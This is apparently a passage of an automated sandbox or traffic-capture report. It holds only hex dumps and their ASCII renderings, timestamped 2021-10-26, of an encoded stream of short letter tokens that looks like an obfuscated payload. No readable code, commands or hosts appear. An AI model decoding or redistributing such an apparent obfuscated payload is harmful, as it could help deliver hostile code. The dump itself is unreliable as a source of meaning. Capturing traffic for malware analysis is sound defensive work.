                                                                                                Data Ascii: g TSU UU TP iO PS pS TMi PP TTp TSO TTU Oi n gO MO Ug MiM PO TSO TTM Pi Mn MgU nM Mg TTi TTn TSP gT TiP iO PS iU TMn TTO Og TMM TTg PS Pi Mi gn TSS TTg TTn Ui TTM PS iU TTS Pi Ui OO UP nn pM PS iU Mp MgM Ui TTi TMn nn TTg PS iU TnU ii TMT TMS Ug pO nO PT
                                                                                                2021-10-26 15:35:17 UTC6792INData Raw: 4d 20 55 55 20 54 4d 6e 20 6e 53 20 54 69 70 20 67 67 20 53 20 50 55 20 50 69 20 54 53 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 4d 67 20 50 53 20 69 55 20 67 50 20 50 67 20 55 53 20 54 54 4f 20 4f 67 20 69 67 20 54 54 4d 20 50 53 20 50 69 20 69 53 20 4d 6e 20 54 54 50 20 55 69 20 54 54 20 4d 67 50 20 54 54 4d 20 50 53 20 50 4d 20 67 6e 20 69 70 20 6e 4f 20 54 53 70 20 4d 69 55 20 67 54 20 54 54 4d 20 50 53 20 69 4f 20 67 6e 20 4d 6e 20 6e 70 20 55 69 20 54 54 69 20 54 4d 67 20 54 54 69 20 54 4f 53 20 54 4d 53 20 50 53 20 50 69 20 55 50 20 4d 53 55 20 54 54 69 20 54 4d 4d 20 54 54 55 20 54 69 69 20 50 50 20 4d 70 20 54 69 4d 20 55 69 20 54 54 69 20 54 54 50 20 6e 54 20 54 4d 4d 20 4d 50 20 4d 67 54 20 50 6e 20 4d 4f 20 54 6e 55 20 54 54 67 20 70 4f 20 54
                                                                                                Data Ascii: M UU TMn nS Tip gg S PU Pi TSU TTi TTn TSO Mg PS iU gP Pg US TTO Og ig TTM PS Pi iS Mn TTP Ui TT MgP TTM PS PM gn ip nO TSp MiU gT TTM PS iO gn Mn np Ui TTi TMg TTi TOS TMS PS Pi UP MSU TTi TMM TTU Tii PP Mp TiM Ui TTi TTP nT TMM MP MgT Pn MO TnU TTg pO T
                                                                                                2021-10-26 15:35:17 UTC6796INData Raw: 53 67 20 67 54 20 4d 67 20 4d 53 20 4d 4d 20 4d 54 6e 20 54 69 4d 20 54 4f 55 20 67 50 20 4d 4d 20 55 6e 20 55 70 20 55 6e 20 55 53 20 50 53 20 4d 67 20 54 70 20 54 54 20 69 54 20 69 4f 20 67 4f 20 69 70 20 4d 6e 20 70 50 20 55 69 20 55 50 20 54 67 53 20 54 70 6e 20 54 4f 4f 20 4d 69 54 20 55 69 20 55 53 20 69 4f 20 4d 67 20 54 4f 20 54 54 20 4d 54 20 55 69 20 55 50 20 54 53 70 20 55 6e 20 54 4d 70 20 55 69 20 4f 69 20 54 55 70 20 55 70 20 4d 50 20 4d 54 6e 20 50 53 20 50 69 20 55 6e 20 70 70 20 54 4d 6e 20 54 53 4f 20 4f 50 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 54 54 20 54 53 4f 20 69 67 20 4d 4f 20 54 4f 20 54 70 20 55 6e 20 54 53 67 20 4f 55 20 70 69 20 54 54 53 20 4d 53 20 54 70 20 69 55 20 54 70 20 50 4d 20 4d 53
                                                                                                Data Ascii: Sg gT Mg MS MM MTn TiM TOU gP MM Un Up Un US PS Mg Tp TT iT iO gO ip Mn pP Ui UP TgS Tpn TOO MiT Ui US iO Mg TO TT MT Ui UP TSp Un TMp Ui Oi TUp Up MP MTn PS Pi Un pp TMn TSO OP PS iU PS Pi Ui TTi TTn TTT TSO ig MO TO Tp Un TSg OU pi TTS MS Tp iU Tp PM MS
                                                                                                2021-10-26 15:35:17 UTC6800INData Raw: 20 54 54 4f 20 4d 53 20 67 67 20 6e 6e 20 4f 50 20 70 53 20 6e 50 20 54 54 55 20 67 70 20 70 6e 20 4f 6e 20 50 50 20 55 69 20 54 4d 53 20 4f 55 20 70 69 20 69 4f 20 4d 53 20 50 69 20 67 6e 20 54 54 54 20 70 70 20 4f 69 20 6e 4d 20 6e 50 20 54 54 4f 20 50 4d 20 4f 50 20 54 4d 50 20 50 50 20 55 69 20 54 4d 53 20 54 4d 54 20 6e 6e 20 54 69 70 20 54 50 55 20 67 54 20 4d 55 20 55 53 20 50 53 20 4d 67 20 54 4f 20 55 20 4d 4d 20 55 6e 20 55 50 20 55 69 20 55 53 20 69 4f 20 55 4d 20 54 53 50 20 4d 53 6e 20 50 67 20 4d 4d 67 20 55 70 20 55 6e 20 55 53 20 69 4f 20 4d 53 20 54 4f 20 55 20 4d 4d 20 55 6e 20 55 70 20 55 6e 20 55 6e 20 55 4f 20 54 4d 4d 20 55 4f 20 54 54 4f 20 4f 54 20 67 69 20 54 6e 70 20 54 53 6e 20 50 69 20 55 69 20 54 54 55 20 4f 69 20 4d 4d 4d 20
                                                                                                Data Ascii: TTO MS gg nn OP pS nP TTU gp pn On PP Ui TMS OU pi iO MS Pi gn TTT pp Oi nM nP TTO PM OP TMP PP Ui TMS TMT nn Tip TPU gT MU US PS Mg TO U MM Un UP Ui US iO UM TSP MSn Pg MMg Up Un US iO MS TO U MM Un Up Un Un UO TMM UO TTO OT gi Tnp TSn Pi Ui TTU Oi MMM
                                                                                                2021-10-26 15:35:17 UTC6805INData Raw: 50 53 20 50 4f 20 54 54 50 20 54 54 70 20 54 53 4f 20 54 54 55 20 67 50 20 70 67 20 55 55 20 55 4f 20 4d 20 54 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 54 53 50 20 69 55 20 50 53 20 50 53 20 54 4d 53 20 54 4d 70 20 54 54 20 50 69 20 54 54 4d 20 50 53 20 50 4d 20 67 67 20 67 55 20 54 53 55 20 50 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 6e 70 20 54 53 55 20 50 53 20 50 69 20 55 53 20 54 53 67 20 6e 53 20 54 54 6e 20 54 69 20 54 53 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 54 4d 20 54 54 70 20 54 53 4f 20 54 54 55 20 54 55 20 54 69 53 20 4d 69 4d 20 4d 53 54 20 54 6e 54 20 54 4f 20 54 53 53 20 4f 55 20 54 6e 20 4f 53 20 67 50 20 67 50 20 4d 4f 20 55 67 20 54 4d 20 69 54 20 54 53 4f 20 54 54 4d 20 50 69 20 67 50 20 67 50 20 67 4f 20 70 4f 20 4f 50 20 54 54
                                                                                                Data Ascii: PS PO TTP TTp TSO TTU gP pg UU UO M TTP TTn TSg Ti TSP iU PS PS TMS TMp TT Pi TTM PS PM gg gU TSU P TTn TSO TTM np TSU PS Pi US TSg nS TTn Ti TSi iU PS PS PO TTM TTp TSO TTU TU TiS MiM MST TnT TO TSS OU Tn OS gP gP MO Ug TM iT TSO TTM Pi gP gP gO pO OP TT
                                                                                                2021-10-26 15:35:17 UTC6809INData Raw: 53 69 20 50 6e 20 50 67 20 4f 4d 20 69 67 20 54 67 4f 20 54 53 4d 20 54 54 67 20 50 53 20 50 54 20 67 70 20 70 20 54 67 54 20 54 54 6e 20 54 54 50 20 4d 4d 6e 20 4d 50 20 4d 55 20 67 50 20 50 67 20 54 55 6e 20 54 54 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 4d 50 20 50 4d 20 67 55 20 50 4f 20 67 4d 20 55 67 20 4f 53 20 69 67 20 54 53 55 20 54 54 4d 20 50 70 20 50 6e 20 50 70 20 69 55 20 54 4d 70 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 50 20 4d 20 50 6e 20 50 53 20 69 50 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 69 55 20 67 53 20 4d 54 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 54 69 20 69 50 20 67 4d 20 54 4f 54 20 54 6e 20 55 69 20 54 54 69 20 54 54 4f 20 54 54 4f 20 4f 67 20 69 4f 20 4d 4d 20 4d 53 20 4d 55 20
                                                                                                Data Ascii: Si Pn Pg OM ig TgO TSM TTg PS PT gp p TgT TTn TTP MMn MP MU gP Pg TUn TTU TTi TTn TSU TMP PM gU PO gM Ug OS ig TSU TTM Pp Pn Pp iU TMp TTi TTn TSO TTP M Pn PS iP Ui TTi TTn TSO TTM PS iU iU gS MT TTi TTn TSg TTi iP gM TOT Tn Ui TTi TTO TTO Og iO MM MS MU
                                                                                                2021-10-26 15:35:17 UTC6813INData Raw: 4d 53 20 50 69 20 67 53 20 54 4d 50 20 54 4d 6e 20 54 54 70 20 54 4d 70 20 6e 53 20 54 50 54 20 50 70 20 4d 6e 20 54 4f 4f 20 69 4f 20 54 4d 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 55 20 69 4d 20 4d 4f 20 50 6e 20 54 70 20 4f 4d 20 4f 53 20 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 4f 20 50 6e 20 4d 4f 20 55 6e 20 54 4d 70 20 4f 69 20 54 50 55 20 54 4d 53 20 4d 70 20 67 55 20 50 54 20 50 69 20 55 4d 20 54 6e 4d 20 55 54 20 6e 4d 20 55 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 55 4f 20 54 54 6e 20 4f 67 20 4d 69 54 20 54 54 4d 20 50 53 20 50 69 20 50 4f 20 4d 4d 20 54 70 53 20 55 4f 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50
                                                                                                Data Ascii: MS Pi gS TMP TMn TTp TMp nS TPT Pp Mn TOO iO TMi Mgg TTn TSO TTU iM MO Pn Tp OM OS S TSO TTM Pp MO Pn MO Un TMp Oi TPU TMS Mp gU PT Pi UM TnM UT nM UU TMp iU PS pS UO TTn Og MiT TTM PS Pi PO MM TpS UO TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS P
                                                                                                2021-10-26 15:35:17 UTC6816INData Raw: 20 55 4f 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 69 6e 20 4d 6e 20 54 54 55 20 55 69 20 54 54 20 70 20 54 54 4d 20 50 53 20 50 4d 20 67 50 20 50 54 20 4d 53 70 20 54 54 54 20 55 55 20 54 54 4f 20 55 70 20 6e 70 20 4f 4d 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 4d 20 4d 69 6e 20 54 4d 67 20 6e 70 20 6e 4f 20 50 53 20 50 69 20 4f 69 20 54 4d 70 20 4f 69 20 54 53 4d 20 4f 4f 20 50 69 20 4d 6e 20 4d 50 50 20 67 6e 20 55 54 20 55 4f 20 54 6e 69 20 4f 70 20 4f 54 20 4d 54 69 20 6e 55 20 4f 50 20 50 69 20 55 69 20 54 54 55 20 54 53 53 20 54 53 50 20 54 69 20 4f 50 20 69 55 20 50 53 20 50 53 20 4d 54 55 20 54 4f 6e 20 4d 70 20 54 50 20 54 54 67 20 50 53 20 50 55 20 54 70 55 20 50 55 20 4f 4d 20 54
                                                                                                Data Ascii: UO iU PS PS MTU TOn Mp TP TTg PS PU in Mn TTU Ui TT p TTM PS PM gP PT MSp TTT UU TTO Up np OM PS Pi US OO TTM Min TMg np nO PS Pi Oi TMp Oi TSM OO Pi Mn MPP gn UT UO Tni Op OT MTi nU OP Pi Ui TTU TSS TSP Ti OP iU PS PS MTU TOn Mp TP TTg PS PU TpU PU OM T
                                                                                                2021-10-26 15:35:17 UTC6820INData Raw: 54 50 20 54 54 6e 20 54 53 67 20 54 69 20 70 55 20 69 55 20 50 53 20 50 53 20 54 67 4d 20 4d 4d 6e 20 54 54 6e 20 54 53 4f 20 54 54 67 20 4d 70 20 54 54 55 20 50 53 20 50 69 20 4f 69 20 54 53 4f 20 54 4d 69 20 4d 20 4d 4f 20 50 54 20 69 55 20 50 70 20 6e 4d 20 67 69 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 70 53 20 54 4d 54 20 69 55 20 50 53 20 50 50 20 54 4d 69 20 50 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 50 20 50 55 20 4f 67 20 4f 54 20 55 50 20 54 54 69 20 54 4d 6e 20 54 4f 20 70 20 50 53 20 69 55 20 50 69 20 4d 67 53 20 4d 50 67 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 54 54 70 20 69 55 20 50 53 20 70 53 20 6e 50 20 54 4d 54 20 4d 70 20 53 20 54 54 67 20 50 53 20 50 55 20 6e 70 20 70 69 20 55 69 20 54 54 69 20 54 54 67 20 54 55 4f 20 4d
                                                                                                Data Ascii: TP TTn TSg Ti pU iU PS PS TgM MMn TTn TSO TTg Mp TTU PS Pi Oi TSO TMi M MO PT iU Pp nM gi TTi TTn TSP TpS TMT iU PS PP TMi PM TTn TSO TMM iP PU Og OT UP TTi TMn TO p PS iU Pi MgS MPg TTi TTn TSU UU TTp iU PS pS nP TMT Mp S TTg PS PU np pi Ui TTi TTg TUO M
                                                                                                2021-10-26 15:35:17 UTC6824INData Raw: 53 20 50 69 20 55 69 20 54 54 50 20 69 20 4d 54 54 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 55 54 20 55 50 20 54 54 69 20 54 4d 6e 20 55 50 20 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 4f 20 54 54 69 20 54 54 6e 20 54 53 50 20 54 4d 70 20 50 69 20 67 67 20 50 50 20 54 6e 4d 20 69 50 20 4d 53 70 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 69 53 20 50 53 20 50 69 20 55 50 20 4d 4f 20 4d 69 54 20 54 53 55 20 54 54 4d 20 50 70 20 55 20 54 53 69 20 50 50 20 55 69 20 54 54 69 20 54 54 20 67 53 20 54 54 4d 20 50 53 20 50 4d 20 70 53 20 50 53 20 70 4f 20 54 54 4f 20 4d 67 4f 20 4d 53 20 70 70 20 50 53 20 69 55 20 50 54 20 6e 54 20 54 53 4d 20 54 54 69 20 54 54 6e 20 54 53 55 20 54 53 70 20 67 54 20 67 69 20 4d 53 20 67 70 20 4f 53 20 4f 53 20 54 69
                                                                                                Data Ascii: S Pi Ui TTP i MTT TTM PS iO Og TUT UP TTi TMn UP U PT iU PS nM gO TTi TTn TSP TMp Pi gg PP TnM iP MSp TTn TSO TTg pn TiS PS Pi UP MO MiT TSU TTM Pp U TSi PP Ui TTi TT gS TTM PS PM pS PS pO TTO MgO MS pp PS iU PT nT TSM TTi TTn TSU TSp gT gi MS gp OS OS Ti
                                                                                                2021-10-26 15:35:17 UTC6828INData Raw: 69 20 55 50 20 4d 4f 20 69 70 20 54 53 4f 20 54 54 4d 20 50 70 20 55 20 67 53 20 50 4d 20 55 69 20 54 54 69 20 54 54 20 4d 69 20 54 54 4d 20 50 53 20 50 4d 20 6e 70 20 6e 54 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 54 55 50 20 50 53 20 69 55 20 50 70 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 50 20 69 55 20 50 53 20 70 53 20 54 53 55 20 54 4d 69 20 54 54 4f 20 54 53 4f 20 54 54 4d 20 6e 70 20 70 4f 20 50 53 20 50 69 20 55 53 20 54 4d 20 69 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 54 6e 53 20 50 50 20 55 69 20 54 4d 53 20 4d 69 4f 20 67 4d 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 55 50 20 54 4d 55 20 50 54 20 69 55 20 50 53 20 6e 4d 20 67 67 20 54 54 69 20 54 54 6e 20 54 53
                                                                                                Data Ascii: i UP MO ip TSO TTM Pp U gS PM Ui TTi TT Mi TTM PS PM np nT Ui TTi TTg M TUP PS iU Pp TUp Mi TTi TTn TSU gT TSP iU PS pS TSU TMi TTO TSO TTM np pO PS Pi US TM i TSO TTM Pi OP TnS PP Ui TMS MiO gM TTM PS iO Og TSO Ui TTi TMn UP TMU PT iU PS nM gg TTi TTn TS
                                                                                                2021-10-26 15:35:17 UTC6832INData Raw: 20 4d 69 20 54 4d 70 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 70 20 54 54 50 20 6e 67 20 67 6e 20 50 53 20 50 69 20 55 53 20 4f 4f 20 54 54 69 20 6e 6e 20 4d 67 67 20 67 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 54 4d 4f 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 67 70 20 69 55 20 4d 69 20 55 4f 20 54 4f 50 20 50 54 20 54 53 50 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 6e 50 20 69 55 20 69 55 20 50 53 20 54 67 20 55 70 20 54 54 69 20 54 54 6e 20 6e 50 20 54 54 4d 20 50 53 20 69 55 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 70 20 50 53 20 4f 4f 20 50 53 20
                                                                                                Data Ascii: Mi TMp Pi Ui TMS TSM TSp TTP ng gn PS Pi US OO TTi nn Mgg gS MMi ii gS TnT TTi TTn TSn UU TMO iU PS iU TMi TO TTn TSO TMM Mgp iU Mi UO TOP PT TSP TSO TTM PS iU PS Pi Ui TTi TTn TSO nP iU iU PS Tg Up TTi TTn nP TTM PS iU TTp Pi Ui TTP TSM Og TTp PS OO PS
                                                                                                2021-10-26 15:35:17 UTC6837INData Raw: 54 53 4f 20 4f 69 20 4d 4d 70 20 69 70 20 4d 70 20 4d 53 54 20 55 69 20 54 54 69 20 54 54 50 20 6e 6e 20 69 55 20 69 50 20 69 55 20 50 53 20 54 55 70 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 55 20 55 55 20 4f 6e 20 69 4f 20 50 53 20 69 55 20 69 50 20 70 4d 20 54 54 6e 20 54 53 4f 20 54 54 67 20 70 6e 20 54 4d 69 20 50 53 20 50 69 20 55 50 20 55 55 20 54 53 4d 20 4f 67 20 54 54 69 20 50 53 20 4d 53 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 54 55 20 67 20 4d 55 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 54 70 20 4d 53 50 20 4d 53 54 20 55 69 20 54 54 69 20 4d 69 4f 20 67 67 20 54 54 4d 20 50 53 20 69 4f 20 4d 70 20 54 53 54 20 55 50 20 54 54 69 20 54 54 50 20 4d 53 20 70 53 20 50 53 20 69
                                                                                                Data Ascii: TSO Oi MMp ip Mp MST Ui TTi TTP nn iU iP iU PS TUp Mi TTi TTn TSU UU On iO PS iU iP pM TTn TSO TTg pn TMi PS Pi UP UU TSM Og TTi PS MS PS Pi Ui TMp TTn TSO On TU g MU MgS ni OS TgU TSO TTM PM Tp MSP MST Ui TTi MiO gg TTM PS iO Mp TST UP TTi TTP MS pS PS i
                                                                                                2021-10-26 15:35:17 UTC6841INData Raw: 70 20 54 70 20 55 67 20 4d 4f 20 54 55 67 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 54 6e 6e 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 69 20 50 54 20 50 69 20 4f 69 20 4d 4f 20 54 55 53 20 54 53 55 20 54 54 4d 20 50 70 20 4d 4d 20 50 67 20 50 4d 20 50 4f 20 4f 67 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 69 54 20 50 54 20 50 69 20 4f 69 20 55 69 20 54 54 4f 20 4d 20 70 54 20 50 53 20 69 55 20 50 70 20 4d 70 20 6e 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 69 4d 20 50 50 20 4f 67 20 4d 69 69 20 55 50 20 54 54 69 20 54 4d 6e 20 6e 50 20 54 54 4f 20 69 55 20 4f 50 20 54 4d 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 69 4f 20 54 54 67 20 50 53 20 50 69 20 4f 67 20 4d 69 6e 20 55 50 20 54 54 69 20 54
                                                                                                Data Ascii: p Tp Ug MO TUg TSU TTM Pp MM Pg PM PO Tnn TTp TSO TMM Og Mii PT Pi Oi MO TUS TSU TTM Pp MM Pg PM PO Og TTp TSO TMM Og MiT PT Pi Oi Ui TTO M pT PS iU Pp Mp ni UO TTU TSM OT MiM PP Og Mii UP TTi TMn nP TTO iU OP TMn Pi Ui TMS Og iO TTg PS Pi Og Min UP TTi T
                                                                                                2021-10-26 15:35:17 UTC6845INData Raw: 20 54 54 50 20 4d 53 20 4d 4d 20 4d 69 20 6e 50 20 54 4f 67 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 54 20 4d 53 4d 20 69 55 20 69 4f 20 70 20 4f 67 20 54 54 69 20 54 53 70 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 4d 20 54 54 4f 20 4d 4d 20 4d 67 53 20 50 53 20 69 55 20 50 69 20 50 67 20 54 4d 69 20 4d 69 6e 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 6e 53 20 54 4d 20 50 53 20 50 69 20 55 70 20 54 54 53 20 55 55 20 54 54 53 20 55 70 20 4d 53 20 4d 70 20 6e 4f 20 54 70 53 20 55 69 20 54 54 69 20 54 54 67 20 6e 53 20 54 67 70 20 50 53 20 50 54 20 4d 20 70 67 20 55 69 20 54 53 4f 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 70 20 54 54 4d 20 54 69 20 4d 50 54 20 54 54 4d 20 50 53 20 50 4d 20
                                                                                                Data Ascii: TTP MS MM Mi nP TOg TTi TTn TSP OT MSM iU iO p Og TTi TSp TSO TTM PS iU PS Pi Ui TTM TTO MM MgS PS iU Pi Pg TMi Min TTn TSO TMM nS TM PS Pi Up TTS UU TTS Up MS Mp nO TpS Ui TTi TTg nS Tgp PS PT M pg Ui TSO TTn TSO TTM PS iU PS Pi Up TTM Ti MPT TTM PS PM
                                                                                                2021-10-26 15:35:17 UTC6848INData Raw: 20 50 55 20 55 69 20 54 54 69 20 54 53 53 20 54 54 54 20 54 53 4f 20 69 54 20 4d 4f 20 50 67 20 54 70 20 69 6e 20 4d 54 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 69 20 4d 4d 20 4d 50 20 54 4f 67 20 55 69 20 54 54 67 20 70 4f 20 54 53 53 20 54 54 4d 20 70 54 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 69 20 69 4f 20 67 55 20 67 53 20 50 67 20 54 54 69 20 55 69 20 4f 50 20 54 70 20 4d 53 4f 20 50 53 20 69 55 20 50 69 20 4d 4f 20 54 6e 4d 20 54 54 69 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 70 67 20 50 53 20 50 69 20 55 69 20 54 4d 70 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 67 4f 20 67 70 20 4d 70 20 55 67 20 55 69 20 54 69 20 4d 53 6e 20 54 54 4d 20 50 53 20 50 4d 20 4d 69 20 54 70 20 54 4d 6e 20 54 67 67 20
                                                                                                Data Ascii: PU Ui TTi TSS TTT TSO iT MO Pg Tp in MTT TTn TSO TTp Mi MM MP TOg Ui TTg pO TSS TTM pT iU PS Pi Ui TTi TTn TSO TTi iO gU gS Pg TTi Ui OP Tp MSO PS iU Pi MO TnM TTi TSM Og TTP PS pg PS Pi Ui TMp TTn TSO On iU gO gp Mp Ug Ui Ti MSn TTM PS PM Mi Tp TMn Tgg
                                                                                                2021-10-26 15:35:17 UTC6852INData Raw: 69 20 55 69 20 54 54 69 20 54 54 4d 20 54 54 70 20 4f 67 20 50 55 20 4d 4d 20 67 70 20 67 4d 20 54 4d 53 20 54 54 70 20 55 67 20 6e 53 20 6e 4f 20 70 67 20 4d 6e 20 54 4f 70 20 50 55 20 54 4d 6e 20 54 67 55 20 54 4d 69 20 54 53 54 20 4d 67 69 20 69 70 20 4d 4f 20 70 4d 20 54 70 20 55 4d 20 4d 4f 20 70 69 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 54 20 54 4f 20 54 4d 6e 20 54 54 67 20 54 4d 6e 20 6e 53 20 54 67 53 20 69 55 20 6e 50 20 54 70 70 20 50 69 20 55 69 20 54 54 55 20 54 53 4d 20 54 53 50 20 4f 6e 20 50 69 20 4d 55 20 50 70 20 67 4f 20 55 53 20 54 54 4d 20 54 54 55 20 54 53 6e 20 67 54 20 4d 69 4d 20 69 4f 20 50 53 20 69 55 20 55 70 20 54 54 70 20 54 54 67 20 4d 20 4d 67 69 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 4d 67 20 54 4d 4d 20 4f 55 20
                                                                                                Data Ascii: i Ui TTi TTM TTp Og PU MM gp gM TMS TTp Ug nS nO pg Mn TOp PU TMn TgU TMi TST Mgi ip MO pM Tp UM MO pi TSO TTM Pp iS T TO TMn TTg TMn nS TgS iU nP Tpp Pi Ui TTU TSM TSP On Pi MU Pp gO US TTM TTU TSn gT MiM iO PS iU Up TTp TTg M Mgi PT iU PM MgM Mg TMM OU
                                                                                                2021-10-26 15:35:17 UTC6856INData Raw: 20 54 53 6e 20 54 6e 69 20 50 55 20 67 67 20 50 4d 20 67 53 20 4d 4d 4d 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 6e 4d 20 4d 67 70 20 4f 70 20 69 55 20 6e 6e 20 4d 53 6e 20 54 54 69 20 54 54 6e 20 54 53 50 20 4f 4f 20 50 67 20 67 67 20 50 67 20 4d 70 20 6e 54 20 4f 4f 20 54 54 69 20 54 54 54 20 54 54 70 20 4f 67 20 4d 53 4f 20 50 54 20 50 69 20 4f 69 20 54 20 54 50 6e 20 54 53 55 20 54 54 4d 20 50 70 20 4f 50 20 4d 50 69 20 50 50 20 55 69 20 54 54 70 20 54 54 4f 20 4d 20 4d 54 54 20 50 54 20 69 55 20 50 4d 20 4d 67 4d 20 54 4d 50 20 55 6e 20 4f 67 20 67 67 20 54 54 4d 20 50 53 20 50 55 20 50 6e 20 50 4d 20 69 6e 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 67 20 50 50 20 67 50 20 69 4f 20 54 4d 53 20 54 4d 67 20 54 53 53 20 54 53 70 20 54 54 69
                                                                                                Data Ascii: TSn Tni PU gg PM gS MMM TTi TTn TSg TnM Mgp Op iU nn MSn TTi TTn TSP OO Pg gg Pg Mp nT OO TTi TTT TTp Og MSO PT Pi Oi T TPn TSU TTM Pp OP MPi PP Ui TTp TTO M MTT PT iU PM MgM TMP Un Og gg TTM PS PU Pn PM in Mgg TTn TSO TTp gg PP gP iO TMS TMg TSS TSp TTi
                                                                                                2021-10-26 15:35:17 UTC6860INData Raw: 54 69 20 54 4f 50 20 54 54 4d 20 50 53 20 50 4d 20 67 53 20 67 70 20 55 70 20 4f 20 4d 54 4f 20 54 53 4f 20 54 54 4d 20 50 69 20 4f 50 20 4d 67 70 20 50 50 20 55 69 20 54 4d 53 20 54 54 4f 20 54 4d 54 20 54 67 20 54 50 70 20 69 55 20 50 53 20 50 53 20 55 70 20 4f 20 4d 54 55 20 54 53 4f 20 54 54 4d 20 50 69 20 4d 55 20 67 4d 20 50 4d 20 69 6e 20 4d 4d 54 20 54 54 6e 20 54 53 4f 20 54 54 70 20 4f 67 20 4d 67 55 20 50 54 20 50 69 20 4f 69 20 54 54 4d 20 4f 6e 20 54 70 20 4d 4d 67 20 50 53 20 69 55 20 50 69 20 50 4d 20 69 6e 20 54 4f 69 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 53 20 67 69 20 69 55 20 6e 6e 20 4d 4d 55 20 54 54 69 20 54 54 6e 20 54 53 50 20 67 54 20 4d 67 70 20 69 4f 20 50 53 20 70 53 20 55 70 20 54 53 4d 20 55 20 4d 4d 54 20 54 54 4d 20 50
                                                                                                Data Ascii: Ti TOP TTM PS PM gS gp Up O MTO TSO TTM Pi OP Mgp PP Ui TMS TTO TMT Tg TPp iU PS PS Up O MTU TSO TTM Pi MU gM PM in MMT TTn TSO TTp Og MgU PT Pi Oi TTM On Tp MMg PS iU Pi PM in TOi TTn TSO TTp gS gi iU nn MMU TTi TTn TSP gT Mgp iO PS pS Up TSM U MMT TTM P
                                                                                                2021-10-26 15:35:17 UTC6864INData Raw: 53 4d 20 4d 53 4f 20 50 67 20 4d 54 54 20 4d 54 69 20 4d 67 4d 20 54 53 55 20 54 4f 53 20 4d 50 69 20 54 6e 55 20 4d 53 53 20 70 6e 20 67 4d 20 4d 53 6e 20 54 69 50 20 4d 53 55 20 50 4f 20 54 55 67 20 4d 54 53 20 54 50 55 20 54 4d 6e 20 4d 53 6e 20 69 54 20 54 67 70 20 54 54 6e 20 54 70 20 4f 70 20 50 69 20 4d 53 70 20 4d 54 67 20 54 70 50 20 54 50 54 20 4d 4d 55 20 54 4d 53 20 54 50 53 20 4d 53 53 20 54 67 69 20 4d 53 55 20 67 20 4d 53 6e 20 54 6e 70 20 4d 4d 55 20 67 69 20 50 4d 20 54 4d 67 20 4d 67 50 20 4d 53 4f 20 4d 54 20 54 70 53 20 54 70 54 20 4d 53 67 20 54 54 67 20 4d 67 6e 20 54 55 50 20 54 67 53 20 4d 67 20 54 4d 54 20 54 54 55 20 54 67 53 20 67 55 20 54 4d 50 20 54 69 54 20 54 69 4f 20 6e 6e 20 54 4d 20 54 69 4d 20 4d 67 4d 20 4d 6e 20 54 54
